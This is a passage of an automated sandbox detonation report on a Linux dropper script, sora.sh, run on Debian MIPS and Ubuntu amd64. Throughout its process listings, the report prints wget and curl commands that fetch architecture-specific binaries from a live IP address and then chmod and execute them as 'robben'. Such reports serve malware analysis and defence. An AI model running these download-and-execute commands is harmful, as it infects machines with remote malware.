| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x robben sora.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-VTggM8]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x robben sora.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-VTggM8]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/bin/cat
[cat i586]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/bin/cat
[cat i686]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-08-22 21:52
Reported
2024-08-23 00:21
Platform
debian9-mipsbe-20240418-en
Max time kernel
88s
Max time network
89s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x robben sora.sh systemd-private-0d943617c3824028a7503bbf4990add1-systemd-timedated.service-Hq7bX9]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x robben sora.sh systemd-private-0d943617c3824028a7503bbf4990add1-systemd-timedated.service-Hq7bX9]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x robben sora.sh systemd-private-0d943617c3824028a7503bbf4990add1-systemd-timedated.service-Hq7bX9]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/bin/cat
[cat i586]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/bin/cat
[cat i686]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-08-22 21:52
Reported
2024-08-23 00:31
Platform
ubuntu2204-amd64-20240522.1-en
Max time kernel
196s
Max time network
385s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 158.51.127.106:80 | | tcp |